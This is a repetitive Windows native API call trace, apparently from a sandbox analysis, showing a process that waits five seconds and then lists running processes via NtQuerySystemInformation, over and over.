NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.148] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.163] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.179] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.194] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.210] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.226] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.243] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.257] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.272] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.287] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.305] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.321] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.334] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.477] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.570] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.615] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.662] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.709] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.756] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.803] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.850] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 